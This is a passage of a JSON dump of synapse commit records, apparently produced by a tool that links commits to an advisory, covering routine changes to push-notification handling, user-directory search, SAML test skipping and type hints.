a/synapse/push/__init__.py", + "+++ b/synapse/push/__init__.py", + "@@ -16,3 +16,3 @@", + " import abc", + "-from typing import TYPE_CHECKING, Any, Dict, Optional", + "+from typing import TYPE_CHECKING, Any, Dict", + "@@ -38,8 +38,17 @@ class Pusher(metaclass=abc.ABCMeta):", + " # should honour this rather than just looking for anything higher", + "- # because of potential out-of-order event serialisation. This starts", + "- # off as None though as we don't know any better.", + "- self.max_stream_ordering = None # type: Optional[int]", + "+ # because of potential out-of-order event serialisation.", + "+ self.max_stream_ordering = self.store.get_room_max_stream_ordering()", + "- @abc.abstractmethod", + " def on_new_notifications(self, max_token: RoomStreamToken) -> None:", + "+ # We just use the minimum stream ordering and ignore the vector clock", + "+ # component. This is safe to do as long as we *always* ignore the vector", + "+ # clock components.", + "+ max_stream_ordering = max_token.stream", + "+", + "+ self.max_stream_ordering = max(max_stream_ordering, self.max_stream_ordering)", + "+ self._start_processing()", + "+", + "+ @abc.abstractmethod", + "+ def _start_processing(self):", + "+ \"\"\"Start processing push notifications.\"\"\"", + " raise NotImplementedError()", + "diff --git a/synapse/push/emailpusher.py b/synapse/push/emailpusher.py", + "index 64a35c199..11a97b8df 100644", + "--- a/synapse/push/emailpusher.py", + "+++ b/synapse/push/emailpusher.py", + "@@ -24,3 +24,2 @@ from synapse.push import Pusher", + " from synapse.push.mailer import Mailer", + "-from synapse.types import RoomStreamToken", + "@@ -95,16 +94,2 @@ class EmailPusher(Pusher):", + "- def on_new_notifications(self, max_token: RoomStreamToken) -> None:", + "- # We just use the minimum stream ordering and ignore the vector clock", + "- # component. This is safe to do as long as we *always* ignore the vector", + "- # clock components.", + "- max_stream_ordering = max_token.stream", + "-", + "- if self.max_stream_ordering:", + "- self.max_stream_ordering = max(", + "- max_stream_ordering, self.max_stream_ordering", + "- )", + "- else:", + "- self.max_stream_ordering = max_stream_ordering", + "- self._start_processing()", + "-", + " def on_new_receipts(self, min_stream_id: int, max_stream_id: int) -> None:", + "@@ -174,3 +159,2 @@ class EmailPusher(Pusher):", + " start = 0 if INCLUDE_ALL_UNREAD_NOTIFS else self.last_stream_ordering", + "- assert self.max_stream_ordering is not None", + " unprocessed = await self.store.get_unread_push_actions_for_user_in_range_for_email(", + "diff --git a/synapse/push/httppusher.py b/synapse/push/httppusher.py", + "index 5408aa129..e8b25bcd2 100644", + "--- a/synapse/push/httppusher.py", + "+++ b/synapse/push/httppusher.py", + "@@ -28,3 +28,2 @@ from synapse.metrics.background_process_metrics import run_as_background_process", + " from synapse.push import Pusher, PusherConfigException", + "-from synapse.types import RoomStreamToken", + "@@ -124,13 +123,2 @@ class HttpPusher(Pusher):", + "- def on_new_notifications(self, max_token: RoomStreamToken) -> None:", + "- # We just use the minimum stream ordering and ignore the vector clock", + "- # component. This is safe to do as long as we *always* ignore the vector", + "- # clock components.", + "- max_stream_ordering = max_token.stream", + "-", + "- self.max_stream_ordering = max(", + "- max_stream_ordering, self.max_stream_ordering or 0", + "- )", + "- self._start_processing()", + "-", + " def on_new_receipts(self, min_stream_id: int, max_stream_id: int) -> None:", + "@@ -194,6 +182,3 @@ class HttpPusher(Pusher):", + " \"\"\"", + "-", + "- fn = self.store.get_unread_push_actions_for_user_in_range_for_http", + "- assert self.max_stream_ordering is not None", + "- unprocessed = await fn(", + "+ unprocessed = await self.store.get_unread_push_actions_for_user_in_range_for_http(", + " self.user_id, self.last_stream_ordering, self.max_stream_ordering", + "diff --git a/synapse/push/pusherpool.py b/synapse/push/pusherpool.py", + "index 9fcc0b8a6..9c12d81cf 100644", + "--- a/synapse/push/pusherpool.py", + "+++ b/synapse/push/pusherpool.py", + "@@ -131,5 +131,4 @@ class PusherPool:", + " # create the pusher setting last_stream_ordering to the current maximum", + "- # stream ordering in event_push_actions, so it will process", + "- # pushes from this point onwards.", + "- last_stream_ordering = await self.store.get_latest_push_action_stream_ordering()", + "+ # stream ordering, so it will process pushes from this point onwards.", + "+ last_stream_ordering = self.store.get_room_max_stream_ordering()", + "diff --git a/synapse/storage/databases/main/event_push_actions.py b/synapse/storage/databases/main/event_push_actions.py", + "index 2e56dfaf3..e5c03cc60 100644", + "--- a/synapse/storage/databases/main/event_push_actions.py", + "+++ b/synapse/storage/databases/main/event_push_actions.py", + "@@ -896,12 +896,2 @@ class EventPushActionsStore(EventPushActionsWorkerStore):", + "- async def get_latest_push_action_stream_ordering(self):", + "- def f(txn):", + "- txn.execute(\"SELECT MAX(stream_ordering) FROM event_push_actions\")", + "- return txn.fetchone()", + "-", + "- result = await self.db_pool.runInteraction(", + "- \"get_latest_push_action_stream_ordering\", f", + "- )", + "- return result[0] or 0", + "-", + " def _remove_old_push_actions_before_txn(" + ], + "changed_files": [ + "changelog.d/8943.misc", + "synapse/push/__init__.py", + "synapse/push/emailpusher.py", + "synapse/push/httppusher.py", + "synapse/push/pusherpool.py", + "synapse/storage/databases/main/event_push_actions.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8943": "" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8943, 8943", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8943", + "relevance": 2 + } + ] + }, + { + "commit_id": "f2783fc201edaa49eafd8be06f8cda16ec1f3d95", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608212550, + "hunks": 10, + "message": "Use the simple dictionary in full text search for the user directory (#8959) * Use the simple dictionary in fts for the user directory * Clarify naming", + "diff": [ + "diff --git a/changelog.d/8959.bugfix b/changelog.d/8959.bugfix", + "new file mode 100644", + "index 000000000..772818bae", + "--- /dev/null", + "+++ b/changelog.d/8959.bugfix", + "@@ -0,0 +1 @@", + "+Fix a bug causing common English words to not be considered for a user directory search.", + "diff --git a/synapse/storage/databases/main/user_directory.py b/synapse/storage/databases/main/user_directory.py", + "index fc8caf46a..ef11f1c3b 100644", + "--- a/synapse/storage/databases/main/user_directory.py", + "+++ b/synapse/storage/databases/main/user_directory.py", + "@@ -398,5 +398,5 @@ class UserDirectoryBackgroundUpdateStore(StateDeltasStore):", + " VALUES (?,", + "- setweight(to_tsvector('english', ?), 'A')", + "- || setweight(to_tsvector('english', ?), 'D')", + "- || setweight(to_tsvector('english', COALESCE(?, '')), 'B')", + "+ setweight(to_tsvector('simple', ?), 'A')", + "+ || setweight(to_tsvector('simple', ?), 'D')", + "+ || setweight(to_tsvector('simple', COALESCE(?, '')), 'B')", + " ) ON CONFLICT (user_id) DO UPDATE SET vector=EXCLUDED.vector", + "@@ -420,5 +420,5 @@ class UserDirectoryBackgroundUpdateStore(StateDeltasStore):", + " VALUES (?,", + "- setweight(to_tsvector('english', ?), 'A')", + "- || setweight(to_tsvector('english', ?), 'D')", + "- || setweight(to_tsvector('english', COALESCE(?, '')), 'B')", + "+ setweight(to_tsvector('simple', ?), 'A')", + "+ || setweight(to_tsvector('simple', ?), 'D')", + "+ || setweight(to_tsvector('simple', COALESCE(?, '')), 'B')", + " )", + "@@ -437,5 +437,5 @@ class UserDirectoryBackgroundUpdateStore(StateDeltasStore):", + " UPDATE user_directory_search", + "- SET vector = setweight(to_tsvector('english', ?), 'A')", + "- || setweight(to_tsvector('english', ?), 'D')", + "- || setweight(to_tsvector('english', COALESCE(?, '')), 'B')", + "+ SET vector = setweight(to_tsvector('simple', ?), 'A')", + "+ || setweight(to_tsvector('simple', ?), 'D')", + "+ || setweight(to_tsvector('simple', COALESCE(?, '')), 'B')", + " WHERE user_id = ?", + "@@ -766,3 +766,3 @@ class UserDirectoryStore(UserDirectoryBackgroundUpdateStore):", + " %s", + "- AND vector @@ to_tsquery('english', ?)", + "+ AND vector @@ to_tsquery('simple', ?)", + " ORDER BY", + "@@ -775,3 +775,3 @@ class UserDirectoryStore(UserDirectoryBackgroundUpdateStore):", + " vector,", + "- to_tsquery('english', ?),", + "+ to_tsquery('simple', ?),", + " 8", + "@@ -781,3 +781,3 @@ class UserDirectoryStore(UserDirectoryBackgroundUpdateStore):", + " vector,", + "- to_tsquery('english', ?),", + "+ to_tsquery('simple', ?),", + " 8", + "diff --git a/tests/storage/test_user_directory.py b/tests/storage/test_user_directory.py", + "index 738e91246..a6f63f4aa 100644", + "--- a/tests/storage/test_user_directory.py", + "+++ b/tests/storage/test_user_directory.py", + "@@ -23,2 +23,4 @@ BOB = \"@bob:b\"", + " BOBBY = \"@bobby:a\"", + "+# The localpart isn't 'Bela' on purpose so we can test looking up display names.", + "+BELA = \"@somenickname:a\"", + "@@ -42,2 +44,5 @@ class UserDirectoryStoreTestCase(unittest.TestCase):", + " )", + "+ yield defer.ensureDeferred(", + "+ self.store.update_profile_in_user_dir(BELA, \"Bela\", None)", + "+ )", + " yield defer.ensureDeferred(", + "@@ -74 +79,19 @@ class UserDirectoryStoreTestCase(unittest.TestCase):", + " self.hs.config.user_directory_search_all_users = False", + "+", + "+ @defer.inlineCallbacks", + "+ def test_search_user_dir_stop_words(self):", + "+ \"\"\"Tests that a user can look up another user by searching for the start if its", + "+ display name even if that name happens to be a common English word that would", + "+ usually be ignored in full text searches.", + "+ \"\"\"", + "+ self.hs.config.user_directory_search_all_users = True", + "+ try:", + "+ r = yield defer.ensureDeferred(self.store.search_user_dir(ALICE, \"be\", 10))", + "+ self.assertFalse(r[\"limited\"])", + "+ self.assertEqual(1, len(r[\"results\"]))", + "+ self.assertDictEqual(", + "+ r[\"results\"][0],", + "+ {\"user_id\": BELA, \"display_name\": \"Bela\", \"avatar_url\": None},", + "+ )", + "+ finally:", + "+ self.hs.config.user_directory_search_all_users = False" + ], + "changed_files": [ + "changelog.d/8959.bugfix", + "synapse/storage/databases/main/user_directory.py", + "tests/storage/test_user_directory.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8959": "User directory search fails for certain letters #2931 User directory won't consider non-new users with stop words in their names #8974" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8959, 8959", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8959", + "relevance": 2 + } + ] + }, + { + "commit_id": "6ff34e00d9bd4e8b0b91347a359b17abeaa22e5a", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607534610, + "hunks": 3, + "message": "Skip the SAML tests if xmlsec1 isn't available. (#8905)", + "diff": [ + "diff --git a/changelog.d/8905.misc b/changelog.d/8905.misc", + "new file mode 100644", + "index 000000000..a9a11a230", + "--- /dev/null", + "+++ b/changelog.d/8905.misc", + "@@ -0,0 +1 @@", + "+Skip the SAML tests if the requirements (`pysaml2` and `xmlsec1`) aren't available.", + "diff --git a/tests/handlers/test_saml.py b/tests/handlers/test_saml.py", + "index 45dc17aba..d21e5588c 100644", + "--- a/tests/handlers/test_saml.py", + "+++ b/tests/handlers/test_saml.py", + "@@ -21,2 +21,20 @@ from tests.unittest import HomeserverTestCase, override_config", + "+# Check if we have the dependencies to run the tests.", + "+try:", + "+ import saml2.config", + "+ from saml2.sigver import SigverError", + "+", + "+ has_saml2 = True", + "+", + "+ # pysaml2 can be installed and imported, but might not be able to find xmlsec1.", + "+ config = saml2.config.SPConfig()", + "+ try:", + "+ config.load({\"metadata\": {}})", + "+ has_xmlsec1 = True", + "+ except SigverError:", + "+ has_xmlsec1 = False", + "+except ImportError:", + "+ has_saml2 = False", + "+ has_xmlsec1 = False", + "+", + " # These are a few constants that are used as config parameters in the tests.", + "@@ -88,2 +106,7 @@ class SamlHandlerTestCase(HomeserverTestCase):", + "+ if not has_saml2:", + "+ skip = \"Requires pysaml2\"", + "+ elif not has_xmlsec1:", + "+ skip = \"Requires xmlsec1\"", + "+", + " def test_map_saml_response_to_user(self):" + ], + "changed_files": [ + "changelog.d/8905.misc", + "tests/handlers/test_saml.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8905": "" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8905, 8905", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8905", + "relevance": 2 + } + ] + }, + { + "commit_id": "5d34f40d494305bb32b3d57c18fb17d98d21a31f", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607705033, + "hunks": 75, + "message": "Add type hints to the push module. (#8901)", + "diff": [ + "diff --git a/changelog.d/8901.misc b/changelog.d/8901.misc", + "new file mode 100644", + "index 000000000..4ff0b94b9", + "--- /dev/null", + "+++ b/changelog.d/8901.misc", + "@@ -0,0 +1 @@", + "+Add type hints to push module.", + "diff --git a/mypy.ini b/mypy.ini", + "index 12408b8d9..334e3a22f 100644", + "--- a/mypy.ini", + "+++ b/mypy.ini", + "@@ -58,8 +58,3 @@ files =", + " synapse/notifier.py,", + "- synapse/push/emailpusher.py,", + "- synapse/push/httppusher.py,", + "- synapse/push/mailer.py,", + "- synapse/push/pusher.py,", + "- synapse/push/pusherpool.py,", + "- synapse/push/push_rule_evaluator.py,", + "+ synapse/push,", + " synapse/replication,", + "diff --git a/scripts-dev/mypy_synapse_plugin.py b/scripts-dev/mypy_synapse_plugin.py", + "index 5882f3a0b..f7f18805e 100644", + "--- a/scripts-dev/mypy_synapse_plugin.py", + "+++ b/scripts-dev/mypy_synapse_plugin.py", + "@@ -33,2 +33,4 @@ class SynapsePlugin(Plugin):", + " \"synapse.util.caches.descriptors._CachedFunction.__call__\"", + "+ ) or fullname.startswith(", + "+ \"synapse.util.caches.descriptors._LruCachedFunction.__call__\"", + " ):", + "diff --git a/synapse/push/action_generator.py b/synapse/push/action_generator.py", + "index fabc9ba12..aaed28650 100644", + "--- a/synapse/push/action_generator.py", + "+++ b/synapse/push/action_generator.py", + "@@ -16,6 +16,11 @@", + " import logging", + "+from typing import TYPE_CHECKING", + "+from synapse.events import EventBase", + "+from synapse.events.snapshot import EventContext", + "+from synapse.push.bulk_push_rule_evaluator import BulkPushRuleEvaluator", + " from synapse.util.metrics import Measure", + "-from .bulk_push_rule_evaluator import BulkPushRuleEvaluator", + "+if TYPE_CHECKING:", + "+ from synapse.app.homeserver import HomeServer", + "@@ -25,6 +30,4 @@ logger = logging.getLogger(__name__)", + " class ActionGenerator:", + "- def __init__(self, hs):", + "- self.hs = hs", + "+ def __init__(self, hs: \"HomeServer\"):", + " self.clock = hs.get_clock()", + "- self.store = hs.get_datastore()", + " self.bulk_evaluator = BulkPushRuleEvaluator(hs)", + "@@ -37,3 +40,5 @@ class ActionGenerator:", + "- async def handle_push_actions_for_event(self, event, context):", + "+ async def handle_push_actions_for_event(", + "+ self, event: EventBase, context: EventContext", + "+ ) -> None:", + " with Measure(self.clock, \"action_for_event_by_user\"):", + "diff --git a/synapse/push/baserules.py b/synapse/push/baserules.py", + "index f5788c1de..621150699 100644", + "--- a/synapse/push/baserules.py", + "+++ b/synapse/push/baserules.py", + "@@ -17,2 +17,3 @@", + " import copy", + "+from typing import Any, 